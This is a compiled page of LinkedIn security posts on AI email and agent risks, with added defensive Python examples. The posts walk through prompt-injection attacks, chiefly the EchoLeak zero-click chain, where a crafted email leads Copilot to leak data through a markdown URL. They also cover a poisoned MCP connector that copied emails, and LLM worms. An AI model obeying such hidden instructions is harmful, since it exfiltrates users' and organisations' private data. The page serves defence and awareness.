Closing the AI email security gap


Summary

Closing the AI email security gap means identifying and addressing new vulnerabilities created by artificial intelligence systems that handle emails, especially those that can be exploited through hidden prompts or automated agent interactions. As AI becomes more integrated into workplace communications, attackers have found ways to manipulate these tools in ways that traditional security methods weren't designed to catch.

  • Inventory connectors: Make a detailed list of every AI tool and connector your team uses, and ensure each one comes from a trusted source before allowing access to sensitive data.
  • Segment contexts: Keep different sources of information—like emails, chats, and calendar invites—separated when processed by AI agents to prevent unwanted mixing of trusted and untrusted data.
  • Monitor agent actions: Set up clear audit trails and human checkpoints for any sensitive tasks performed by AI, so you can quickly spot suspicious activity and stay ahead of potential data leaks.
Summarized by AI based on LinkedIn member posts
  • The Trojan Agent: The Next Big AI Security Risk

    History repeats. The Greeks wheeled a gift horse into Troy. The Trojans celebrated. And then the soldiers climbed out at night and opened the gates. Fast forward to today: enterprises are rolling out AI agents everywhere. These agents do not just chat, they act. They send emails, touch financial systems, move data, and connect to your core business apps.

    The universal connector that makes this possible is called the Model Context Protocol, MCP. Think of it as the USB port for AI. Plug it in and your agent suddenly has access to your email, CRM, ERP, or code repo. And here is the catch: if that connector is poisoned, your AI becomes the perfect Trojan Horse.

    This is not theory.
    🔸 A malicious package called postmark-mcp built trust over 15 clean releases before slipping in one line of code that quietly copied every email to an attacker. Invoices, contracts, password resets, even 2FA codes were siphoned off. Thousands of sensitive emails a day. Silent. Invisible.
    🔸 Another flaw, CVE-2025-6514, showed how connecting to an untrusted MCP server could hand attackers remote code execution on your machine. Severity: critical.
    🔸 Security researchers are already finding DNS rebinding issues, token misuse, and shadow MCPs running on developer laptops with full access to files, browsers, and company data.

    Why this matters for CEOs and boards:
    🔸 It bypasses your firewalls. These connectors run inside your trusted environment.
    🔸 It looks like business as usual. The AI still delivers the right output while leaking everything behind your back.
    🔸 It is invisible to traditional security tools. Logs are minimal, reviews are skipped, and normal monitoring will not catch it.
    🔸 It scales with autonomy. An AI can make thousands of bad calls in minutes. Human-speed incident response can't keep up.

    Warning: If you treat AI connectors like harmless plugins, you are rolling a Trojan Horse straight through your gates.

    What you should be asking today:
    ✔ Can we inventory every AI connector in use? Or are developers pulling random ones from the internet?
    ✔ Do we only allow vetted, signed, and trusted connectors? Or are we taking anything that looks convenient?
    ✔ Are permissions scoped and temporary, or did we hand them god-like access?
    ✔ Do we have an audit trail showing who did what through which AI agent? Or will we be blind during an investigation?
    ✔ Do we block obvious exfiltration routes, like unknown SMTP traffic or shady domains?

    I am releasing a whitepaper soon. It breaks down real attacks, governance strategies, and a Security Maturity Model for leaders. The lesson is simple: AI connectors are not developer toys. They are the new supply chain risk. Treat them with the same rigor as financial systems or the next breach headline could be yours.

    🔔 Follow Michael Reichstein for more AI security and governance #cybersecurity #ciso #aigovernance #riskmanagement #boardroom #strategy #leadership #supplychain
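The questions in the post above (inventory, vetted connectors, scoped and temporary permissions) map onto one concrete control. What follows is an added example, not code from the post and not any MCP implementation's own logic: each approved connector release is pinned by name, version and SHA-256 digest; an unpinned release is refused, so a new version does not inherit the trust earned by earlier clean ones (the postmark-mcp pattern described above); a digest mismatch is refused; and a connector asking for more scopes than its grant is refused. The package name `example-mail-mcp`, its contents, the digests and the scope names are constructed placeholders.

```python
import hashlib
from dataclasses import dataclass


@dataclass(frozen=True)
class PinnedConnector:
    """One vetted connector release: exact name, version, package digest,
    and the scopes it may hold."""
    name: str
    version: str
    sha256: str
    allowed_scopes: frozenset


def package_digest(package_bytes: bytes) -> str:
    """SHA-256 of the connector package as downloaded. Pinning this is what
    stops a later, tampered release from riding on the trust of clean ones."""
    return hashlib.sha256(package_bytes).hexdigest()


# Constructed package contents standing in for a connector release (hypothetical name).
CLEAN_RELEASE = b"example-mail-mcp 1.0.15: tools = [send_email(to, subject, body)]\n"
# Same version string, one extra line: the digest no longer matches the vetted release.
TAMPERED_RELEASE = CLEAN_RELEASE + b"forward_copy_to = 'someone-else'\n"

# Constructed approved inventory: (name, version) -> pinned release.
APPROVED = {
    ("example-mail-mcp", "1.0.15"): PinnedConnector(
        name="example-mail-mcp",
        version="1.0.15",
        sha256=package_digest(CLEAN_RELEASE),
        allowed_scopes=frozenset({"mail:send"}),
    ),
}


def vet_connector(name, version, package_bytes, requested_scopes):
    """Decide whether an agent may load this connector.

    Returns (allowed, reason). Unknown releases, digest mismatches and scope
    creep are each refused with a distinct reason so the denial is auditable."""
    pinned = APPROVED.get((name, version))
    if pinned is None:
        return False, f"{name}@{version} is not in the approved inventory"
    if package_digest(package_bytes) != pinned.sha256:
        return False, f"{name}@{version} digest does not match the vetted release"
    excess = set(requested_scopes) - pinned.allowed_scopes
    if excess:
        return False, f"{name}@{version} requests scopes beyond its grant: {sorted(excess)}"
    return True, "ok"


def find_shadow_connectors(installed):
    """Given (name, version) pairs found on a host, return those with no
    approved pin: the 'shadow MCP' inventory gap."""
    return sorted(pair for pair in installed if pair not in APPROVED)
```

Running `vet_connector("example-mail-mcp", "1.0.16", CLEAN_RELEASE, ["mail:send"])` is refused even though the bytes are clean, because the inventory, not the package's reputation, is the source of trust; that is the deliberate cost of pinning, paid for by a review step each time a release is added.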

  • James Cupps
    VP Security Architecture and Engineering

    As generative AI tools become embedded across email, chat and knowledge systems, they introduce a novel breed of cyber-threat: self-propagating “LLM worms” that spread not via malicious code, but through hidden prompts and prompt-injection attacks. This whitepaper surveys the latest research (including the Morris II proof-of-concept worm), real-world vulnerabilities (such as Slack’s AI leak incident and CVE-2024-5184 in EmailGPT), and emerging attack vectors across multi-agent AI frameworks. It then outlines a layered defense strategy—combining robust prompt filtering, policy-driven guardrails, retrieval-pipeline hardening, and AI-aware monitoring—and recommends enterprise tools (e.g., NeMo Guardrails, LLM Guard, WhyLabs, Lasso) to shore up your AI environment. Finally, it presents red-team scenarios to validate your controls and governance guidance to ensure AI-driven risks are managed at the boardroom level. By understanding these worm-class threats and adopting best practices now, organizations can harness LLM innovation securely—and stay one step ahead of attackers who aim to weaponize AI.

  • María Luisa Redondo Velázquez
    IT Cybersecurity Director | Technology Executive | Security Strategy and Digital transformation - Security Architecture & Operations | Cloud Expertise | Malware Analysis, TH and Threat Intelligence | Board Advisor

    📛 CVE-2025-32711 is a turning point

    Last week, we saw the first confirmed zero-click prompt injection breach against a production AI assistant. No malware. No links to click. No user interaction. Just a cleverly crafted email quietly triggering Microsoft 365 Copilot to leak sensitive org data as part of its intended behavior.

    Here’s how it worked:
    • The attacker sent a benign-looking email or calendar invite
    • Copilot ingested it automatically as background context
    • Hidden inside was markdown-crafted prompt injection
    • Copilot responded by appending internal data into an external URL owned by the attacker
    • All of this happened without the user ever opening the email

    This is CVE-2025-32711 (EchoLeak). Severity 9.3. Let that sink in. The AI assistant did exactly what it was designed to do. It read context, summarized, assisted. But with no guardrails on trust boundaries, it blended attacker inputs with internal memory. This wasn’t a user mistake. It wasn’t a phishing scam. It was a design flaw in the AI data pipeline itself.

    🧠 The Novelty
    What makes this different from prior prompt injection?
    1. Zero click. No action by the user. Sitting in the inbox was enough
    2. Silent execution. No visible output or alerts. Invisible to the user and the SOC
    3. Trusted context abuse. The assistant couldn’t distinguish between hostile inputs and safe memory
    4. No sandboxing. Context ingestion, generation, and network response occurred in the same flow
    This wasn’t just bad prompt filtering. It was the AI behaving correctly in a poorly defined system.

    🔐 Implications
    For CISOs, architects, and Copilot owners - read this twice.
    → You must assume all inputs are hostile, including passive ones
    → Enforce strict context segmentation. Copilot shouldn’t ingest emails, chats, docs in the same pass
    → Treat prompt handling as a security boundary, not just UX
    → Monitor agent output channels like you would outbound APIs
    → Require your vendors to disclose what their AI sees and what triggers it

    🧭 Final Thought
    The next wave of breaches won’t look like malware or phishing. They will look like AI tools doing exactly what they were trained to do but in systems that never imagined a threat could come from within a calendar invite. Patch if you must. But fix your AI architecture before the next CVE hits.

  • Imagine receiving what looks like a routine business email. You never even open it. Within minutes, your organisation’s most sensitive data is being silently transmitted to attackers. This isn’t science fiction. It happened with EchoLeak.

    AIM Security’s research team discovered the first zero-click AI vulnerability, targeting Microsoft 365 Copilot. The attack is elegant and terrifying: a single malicious email can trick Copilot into automatically exfiltrating email histories, SharePoint documents, Teams conversations, and calendar data. No user interaction required. No suspicious links to click. The AI agent does all the work for the attacker.

    Here’s what caught my attention as a security professional: The researchers bypassed Microsoft’s security filters using conversational prompt injection – disguising malicious instructions as normal business communications. They exploited markdown formatting quirks that Microsoft’s filters missed. Then they used browser behaviour to automatically trigger data theft when Copilot generated responses. Microsoft took five months to patch this (CVE-2025-32711). That timeline tells you everything about how deep this architectural flaw runs.

    The broader implication: this isn’t a Microsoft problem, it’s an AI ecosystem problem. Any AI agent that processes untrusted inputs alongside internal data faces similar risks. For Australian enterprises racing to deploy AI tools, EchoLeak exposes a critical blind spot. We’re securing the AI like it’s traditional software, but AI agents require fundamentally different security approaches. The researchers call it “LLM Scope Violation” – when AI systems can’t distinguish between trusted instructions and untrusted data. It’s a new vulnerability class that existing frameworks don’t adequately address.

    Three immediate actions for security leaders:
    • Implement granular access controls for AI systems
    • Deploy advanced prompt injection detection beyond keyword blocking
    • Consider excluding external communications from AI data retrieval

    EchoLeak proves that theoretical AI risks have materialised into practical attack vectors. The question isn’t whether similar vulnerabilities exist in other platforms – it’s when they’ll be discovered. #AISecurity #CyberSecurity #Microsoft365 #EnterpriseAI #InfoSec #Australia #TechLeadership https://lnkd.in/gNfxV3Nk

  • Srini Kasturi
    CXO / NED / SMCR

    “Have your agent speak to my agent.”

    Coming soon to a workplace near you:
    - Calls by agents answered by agents.
    - Emails written and sent by agents read and responded to by agents.

    On the surface, this sounds like efficiency heaven — machines handling the noise so humans can focus on the signal. But beneath it lies a very real danger. When communication chains become machine-to-machine, we’re not just talking about faster workflows — we’re talking about new attack surfaces.

    The Risk
    Traditional phishing relies on human error: a misplaced click, a fake invoice, a spoofed email. With AI agents in the loop, the game changes:
    Prompt Injection: malicious actors embed hidden instructions inside messages, documents, or even data feeds. If an agent reads them, it may execute actions outside its intended scope.
    Agent Manipulation: a cleverly crafted request could trick one agent into leaking data, initiating transactions, or escalating privileges — and another agent may obediently carry out the chain reaction.
    Amplified Scale: unlike humans, agents don’t get tired, suspicious, or distracted. If compromised, they can be manipulated consistently, at speed, and at scale.
    This isn’t phishing as we know it. It’s phishing 2.0 — machine-to-machine deception, invisible to most of us until damage is already done.

    Staying Safe
    Organisations will need to rethink security in an agent-driven world:
    Guardrails & Sandboxing: ensure agents operate within strictly defined boundaries — never with unconstrained access.
    Input Validation: treat every external input (email, attachment, call transcript) as potentially hostile, even if it “looks” routine.
    Audit & Transparency: require logs, explanations, and human-visible checkpoints before sensitive actions.
    Zero-Trust Mindset: don’t assume a message from an “agent” is safe just because it came from a trusted domain.

    The future will be “agent-to-agent.” The challenge is to make sure it’s not “attacker-to-agent.” Because when your agent speaks to mine, we need to be confident they’re not both being played.
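The "Staying Safe" list above (strictly defined boundaries, logs, human-visible checkpoints before sensitive actions) can be enforced at a single choke point between an agent and the tools it calls. The following is an added example, not code from the post: an action gateway that holds a scoped, expiring grant per agent, requires a named human approver before any sensitive action runs, and writes an audit record for every decision, allowed or not. The agent id, scope names, actions and timestamps are constructed.

```python
import json
from dataclasses import dataclass, field

# Actions that always need a human-visible checkpoint before they execute.
SENSITIVE_ACTIONS = {"send_email", "transfer_funds", "grant_access"}


@dataclass(frozen=True)
class AgentGrant:
    """Scoped, time-limited permission set for one agent."""
    agent_id: str
    scopes: frozenset
    expires_at: int  # epoch seconds; grants are temporary by construction


@dataclass
class ActionGateway:
    audit_log: list = field(default_factory=list)

    def request(self, grant, action, params, now, approved_by=None):
        """Evaluate one proposed agent action and record the outcome.

        Order of checks: grant validity, scope, then human approval for
        sensitive actions. The agent only ever sees the decision string;
        the audit record keeps who, what and through which agent."""
        if now >= grant.expires_at:
            decision = "denied:grant_expired"
        elif action not in grant.scopes:
            decision = "denied:out_of_scope"
        elif action in SENSITIVE_ACTIONS and approved_by is None:
            decision = "pending:human_approval"
        else:
            decision = "allowed"
        self.audit_log.append({
            "ts": now,
            "agent": grant.agent_id,
            "action": action,
            "params": params,
            "approved_by": approved_by,
            "decision": decision,
        })
        return decision

    def audit_jsonl(self):
        """Audit trail as JSON lines, one record per decision, for shipping to a SIEM."""
        return "\n".join(json.dumps(r, sort_keys=True) for r in self.audit_log)

    def actions_by_agent(self, agent_id):
        """Everything a given agent attempted: the question an investigation asks first."""
        return [r for r in self.audit_log if r["agent"] == agent_id]


def demo():
    """Walk a constructed grant through the four outcomes; returns (decisions, gateway)."""
    gw = ActionGateway()
    grant = AgentGrant("mail-assistant-01", frozenset({"read_inbox", "send_email"}), expires_at=2_000)
    decisions = [
        gw.request(grant, "read_inbox", {"folder": "Inbox"}, now=1_000),
        gw.request(grant, "transfer_funds", {"amount": 5000}, now=1_001),
        gw.request(grant, "send_email", {"to": "cfo@corp.example"}, now=1_002),
        gw.request(grant, "send_email", {"to": "cfo@corp.example"}, now=1_003, approved_by="alice"),
        gw.request(grant, "read_inbox", {"folder": "Inbox"}, now=3_000),
    ]
    return decisions, gw
```

Denied and pending requests are logged exactly like allowed ones; an agent that is being manipulated at scale shows up first as a burst of out-of-scope or pending records, which is the signal the post says human-speed response otherwise misses.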

  • Francis Odum
    Founder @ Software Analyst Cybersecurity Research

    One of the core themes I'm tracking closely (starting next month) is understanding the best solutions for preventing data exfiltration and the role that security for AI/LLMs companies will play in solving this issue for enterprises. I'm interested in seeing how the AI security category inflects this year in helping organizations prevent data leakage relative to other areas like data security (specifically data loss prevention (DLP)), which I wrote about last month.

    Let's explore the relationship between data security (DLP-focused) vendors relative to security for AI vendors for a moment. While there are many AI security vendors, I find it interesting to see what Prompt Security has built in and around preventing data leakage. The rise of ChatGPT and Microsoft 365 Copilot continues to transform how enterprises work—but it’s also exposing them to new data risks that legacy Data Loss Prevention (DLP) solutions weren’t built to handle.

    We've seen GenAI introduce dynamic risks around:
    - Shadow AI: Undetected tools used by employees.
    - Prompt Injection: Malicious manipulation of AI outputs.
    - Sensitive data leaks: Unintentional data exposure during AI interactions.

    What I'm seeing is that AI security companies like Prompt Security or others are managing this risk for organizations better in the Gen-AI enterprise stack. Unlike legacy DLP / data security vendors, they are showing better promise at:
    1) Redacting sensitive data in real time before it reaches GenAI tools. For example, we see better detection capabilities from pattern matching to contextual AI-based detection: for instance, DLPs like Zscaler can detect a social security number, but companies like Prompt can detect a corporate document with intellectual property better.
    2) Better at detecting unauthorized AI tool usage (Shadow AI) across M365 AI tools, GitHub Copilots and many more
    3) Better at preventing AI-specific attacks like prompt injections.
    4) These companies are able to surface educational popups so that employees or users are aware of when they're using an AI site or have violated the company AI policy
    5) Full observability of AI usage and ensuring compliance.

    In general, AI security startups like Prompt Security (and a few others too) are showing they can dynamically adapt to the fluid, unstructured nature of data as it deals with GenAI interactions and take actions as needed with an agent or extension. In 2025, as more organizations embrace GenAI to stay competitive, data security is top of mind / foundational, so it'll be interesting to see how GenAI startups vs legacy DLP / data security vendors interact in this market. This is a trend to watch and I'll be uncovering this theme closely later next month!

  • Tracy Bannon
    Real Technologist | Software Architect | Researcher | Change Agent | Engineer | DevOps Champion | International Speaker | Author/Journalist | Mentor | Ambassador

    I feel like I'm late to the game knowing about this Copilot attack vector. <dang>. This Zero-Click AI Data Leak in Microsoft Copilot is a wake-up call for software architects.

    A new vulnerability dubbed EchoLeak (CVE-2025-32711) was quietly disclosed and patched in Microsoft 365 Copilot. Here’s the chilling part: it was a zero-click exfiltration attack. No phishing link. No user interaction. Just a malicious email… and an overly helpful AI assistant. Copilot, trying to be useful, pulled in context from an attacker-crafted email. Hidden in that message was a prompt injection. The result? Sensitive info was leaked through a markdown link—without the user ever doing anything.

    As a software architect and AI researcher, I’m not just watching the vulnerabilities. I’m mapping the architectural fault lines. This is more than a security patch—it’s a signal flare:
    ++ LLMs are dynamic runtimes, not passive tools.
    ++ RAG pipelines can turn helpful summarization into autonomous breach vectors.
    ++ Without AI-specific threat modeling, traditional controls fall flat.

    We must shift our architecture thinking:
    --> Design for context isolation and prompt sanitation.
    --> Harden the RAG pipelines and avoid untrusted data ingestion by default.
    --> Implement output auditing to detect exfil paths like markdown/image links.

    Yes, you always hear me say that GenAI has groundbreaking potential with challenges and limitations... It is changing the entire SDLC including how architects need to defend against how attackers exfiltrate. The link to the article is in the comments. #ArchAITecture #AI4SDLC #SecureByDesign #GenAI
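The output-auditing control named in this post, and in the EchoLeak write-ups earlier on the page (monitor agent output channels like outbound APIs), is a check that runs on the generated reply before a client renders it. The following is an added example, not code from the post or from any vendor product: it extracts every markdown link, markdown image and bare URL from a response, flags any host outside an allowlist, flags an allowlisted host when the query string is long enough to be carrying content rather than a parameter, and rewrites the flagged references so the client never auto-fetches them. The allowlisted hosts and the sample reply are constructed; `collector.invalid` is a placeholder under a reserved TLD.

```python
import re
from urllib.parse import urlparse

# Assumption: the only hosts a client may render links or images for.
ALLOWED_HOSTS = {"corp.example", "docs.corp.example"}

MD_LINK = re.compile(r"!?\[[^\]]*\]\(([^)\s]+)\)")  # [text](url) and ![alt](url)
BARE_URL = re.compile(r"https?://[^\s)]+")


def _host_allowed(host):
    return host in ALLOWED_HOSTS or any(host.endswith("." + h) for h in ALLOWED_HOSTS)


def extract_urls(text):
    """Every URL a response would cause a client to fetch or offer, in order, deduplicated."""
    urls = [m.group(1) for m in MD_LINK.finditer(text)] + BARE_URL.findall(text)
    return list(dict.fromkeys(urls))


def audit_output(text, max_query_len=64):
    """Flag URLs that could carry data out of the tenant.

    Two reasons are reported: 'external_host' for any host off the allowlist, and
    'long_query' for an allowed host whose query string is long enough to smuggle
    content. An image reference is the worse case because clients fetch it without
    a click, but both forms are flagged the same way."""
    findings = []
    for url in extract_urls(text):
        parsed = urlparse(url)
        host = parsed.hostname or ""
        if not host:
            continue  # relative link: nothing leaves the rendering origin
        if not _host_allowed(host):
            findings.append({"url": url, "host": host, "reason": "external_host"})
        elif len(parsed.query) > max_query_len:
            findings.append({"url": url, "host": host, "reason": "long_query"})
    return findings


def sanitize(text):
    """Replace flagged references with an inert placeholder; unflagged links are untouched."""
    bad = {f["url"] for f in audit_output(text)}
    text = MD_LINK.sub(lambda m: "[link removed by policy]" if m.group(1) in bad else m.group(0), text)
    return BARE_URL.sub(lambda m: "[url removed by policy]" if m.group(0) in bad else m.group(0), text)


# Constructed sample of a generated reply: one legitimate link on an allowed host, and one
# image whose destination is off-domain and whose query string carries smuggled content.
SAMPLE_RESPONSE = (
    "Q3 summary: revenue up 4%. Full report: [Q3 report](https://docs.corp.example/q3)\n"
    "![status](https://collector.invalid/p.png?d=" + "x" * 80 + ")"
)
```

Run `audit_output` on every response and alert on its findings even when `sanitize` has already neutralised them: a response that keeps trying to emit external image links is the observable symptom of an injection that the context-side controls missed.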

  • Gerald Auger, Ph.D.
    🌐 SimplyCyber.io/Socials | 10M+ Views on YT 😱 | 💥 I share my passion for GRC cybersecurity to help everyone! 💥as seen on MTV✨

    Your employees are using AI right now without telling you. And most have no idea they're creating security risks. Here are the 7 AI threats every employee needs to recognize:

    It's Cybersecurity Awareness Month, and I'm teaming up with Cisco to focus the entire month on "Cybersecurity Awareness Month in the Age of AI." Week 1 is all about building AI awareness for everyone in your organization. The biggest AI security risks aren't coming from sophisticated hackers. They're coming from well-meaning employees who don't understand the risks.

    1️⃣ Shadow AI Usage 🎯 Your team is uploading sensitive data to ChatGPT, Claude, and other public AI tools without realizing it becomes training data.
    What to watch for: Employees copying customer data, financial information, or proprietary processes into AI chat interfaces.

    2️⃣ Prompt Injection Attacks 🔧 Malicious instructions hidden in documents or emails can hijack AI tools to perform unintended actions.
    What to watch for: Suspicious files designed to be processed by AI tools, or unusual AI outputs that don't match your request.

    3️⃣ AI-Generated Phishing 📧 Attackers use AI to create highly personalized, convincing phishing emails that bypass traditional detection.
    What to watch for: Emails that reference specific company information or personal details with unusual accuracy.

    4️⃣ Deepfake Social Engineering 🎭 Voice and video deepfakes of executives requesting urgent financial transfers or sensitive information.
    What to watch for: Unusual urgency in voice/video calls, especially regarding financial transactions or access requests.

    5️⃣ AI Hallucination Risks 🤖 AI tools confidently provide incorrect information that employees act on without verification.
    What to watch for: AI providing "facts" about regulations, procedures, or technical specifications without sources.

    6️⃣ Over-Privileged AI Access 🔑 Employees giving AI tools access to company systems, databases, or applications they shouldn't touch.
    What to watch for: AI tools requesting system permissions or being connected to business-critical applications.

    7️⃣ AI-Powered Reconnaissance 🕵️ Attackers use AI to analyze your public information and social media to plan targeted attacks.
    What to watch for: Unusually specific knowledge about your organization in unsolicited communications.

    The Reality: Every employee using AI becomes a potential security risk or security asset. The difference is awareness and training. Education tip: Create simple rules like "AI confidence doesn't equal AI accuracy" and "if you wouldn't post it on social media, don't put it in public AI." What AI security concern do you hear most from your team? Share it in the comments - let's educate each other ⬇️ ♻️ Repost this if your organization needs this awareness. Follow 👉🏼 Gerald Auger, Ph.D. for more Cybersecurity Awareness Month insights.
